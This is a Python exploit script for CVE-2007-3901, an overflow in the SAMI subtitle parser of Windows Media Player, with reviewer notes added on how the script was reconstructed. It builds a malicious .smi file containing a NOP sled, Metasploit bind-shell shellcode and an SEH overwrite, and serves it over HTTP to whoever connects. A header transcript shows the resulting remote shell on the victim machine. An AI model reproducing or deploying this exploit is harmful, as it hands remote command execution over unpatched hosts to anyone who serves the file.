sami-overflow.txt
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# http://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Windows Media Player Open---> http://attacker/anyfile.smi
# .smi extension is necessary, filename can be anything.
#
# NOTE(review): this listing was recovered from a collapsed, backslash-stripped
# copy; the transcript below is reformatted, and the "\r" in the author's
# Desktop path had been eaten by the same stripping.
#
# badrobot:/home/matte# ./mplayer.py
# [+] Listening on port 80
# [+] Connection accepted from: 192.168.1.243
# [+] Payload sent, check your shell on 192.168.1.243 port 4444
# badrobot:/home/matte# nc 192.168.1.243 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Documents and Settings\ryujin\Desktop>ipconfig
# ipconfig
#
# Windows 2000 IP Configuration
#
# Ethernet adapter Local Area Connection:
#
#   Connection-specific DNS Suffix . :
#   IP Address. . . . . . . . . . . . : 192.168.1.243
#   Subnet Mask . . . . . . . . . . . : 255.255.255.0
#   Default Gateway . . . . . . . . . 
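# (tail of the ipconfig transcript in the header comment above)
#   ... Default Gateway . . . . . . . . . :
#
# C:\Documents and Settings\ryujin\Desktop>
##########################################################################
#
# Reconstruction notes (review):
#   * Every backslash had been stripped from this listing ("xfc" for "\xfc",
#     "HTTP/1.1 200 OK " for "HTTP/1.1 200 OK\r\n"), so the string literals
#     were ASCII text rather than the intended bytes.  They are restored here.
#   * All offsets and the SEH handler address 0x77e11e2b are specific to the
#     "Tested on" build named in the header; on any other build the handler
#     address will almost certainly not point at a usable pop/pop/ret.
#   * Written to run on both Python 2.6+ and Python 3 (bytes literals,
#     print() with a single argument).
import socket

# --- SAMI document --------------------------------------------------------
# The oversized value of the bogus "pippo" attribute on <SYNC> is what
# overflows the SAMI parser (CVE-2007-3901); the markup around it is only
# there so the file is accepted as a subtitle document.  Line breaks were
# restored from a collapsed listing; the overflow offsets are counted from
# the first byte of the attribute value, so whitespace in the markup before
# it should not matter -- TODO confirm against the tested target.
SMI_HEAD = b"""<SAMI>
<HEAD>
<STYLE TYPE="text/css">
<!--
P { font-size: 1em; font-family: Arial; font-weight: normal; color: #FFFFFF;
    background: #000000; text-align: center; padding-left: 5px;
    padding-right: 5px; padding-bottom: 2px; }
.ENUSCC { Name: English; lang: EN-US-CC; }
-->
</STYLE>
</HEAD>
<BODY>
"""
SMI_ATTR_OPEN = b'<SYNC Start="0" pippo="'
SMI_TAIL = b'<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'

# Metasploit bind shell on port 4444, EXITFUNC seh (317 bytes)
SHELLCODE = (
    b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
    b"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
    b"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
    b"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
    b"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
    b"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
    b"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
    b"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
    b"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
    b"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
    b"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
    b"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
    b"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
    b"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
    b"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
    b"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
    b"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
    b"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
    b"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
    b"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
)

# SEH record: next-SEH = short jmp +6 (over the handler field), handler =
# 0x77e11e2b little-endian (Windows 2000 SP4 English, see header).
SEH_RECORD = b"\xeb\x06\x90\x90" + b"\x2b\x1e\xe1\x77"
# Landing pad after the short jump: 4 NOPs, then E9 rel32 = -0x195 (-405),
# then 2 NOPs.  -405 from the end of the E9 instruction lands 12 bytes into
# the 16-byte NOP sled in front of the shellcode (see build_smi layout).
NEAR_JMP_BACK = b"\x90" * 4 + b"\xE9\x6B\xFE\xFF\xFF\x90\x90"

# Minimal HTTP response; the player reads the body until the server closes
# the connection, so no Content-Length is sent.
HTTP_HEADER = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/smil\r\n"
    b"\r\n"
)


def build_smi():
    """Return the malicious SAMI document as bytes.

    Layout of the ``pippo`` attribute value (offsets from its first byte):

      0       21988 x 'A'      filler up to the SEH record
      21988   16 x NOP         sled that the near jump lands in
      22004   SHELLCODE        317 bytes
      22321   67 x 'C'         filler
      22388   SEH_RECORD       8 bytes
      22396   NEAR_JMP_BACK    4 NOPs, E9 -0x195, 2 NOPs (11 bytes)
      22407   143505 x 'E'     trailing filler, then the closing quote
    """
    overflow = b"".join([
        b"A" * 21988,
        b"\x90" * 16,          # NOP sled
        SHELLCODE,
        b"C" * 67,             # pad up to the SEH record
        SEH_RECORD,
        NEAR_JMP_BACK,
        b"E" * 143505,
    ])
    return SMI_HEAD + SMI_ATTR_OPEN + overflow + b'">' + SMI_TAIL


def build_payload():
    """Return the full HTTP response (header + SAMI body) as bytes."""
    return HTTP_HEADER + build_smi()


def serve(port=80):
    """Listen on *port*, serve the payload to the first client, then exit.

    The request is consumed but never inspected: whoever connects gets the
    payload.  Sockets are closed on every exit path.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow an immediate re-run while the previous socket is in TIME_WAIT.
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        print("[+] Listening on port %d" % port)
        conn, addr = srv.accept()
        try:
            print("[+] Connection accepted from: %s" % addr[0])
            conn.recv(1024)  # drain (part of) the GET request; not validated
            # sendall: the response is ~166 KB, a single send() may be partial.
            conn.sendall(build_payload())
            print("[+] Payload sent, check your shell on %s port 4444" % addr[0])
        finally:
            conn.close()
    finally:
        srv.close()


if __name__ == "__main__":
    serve(80)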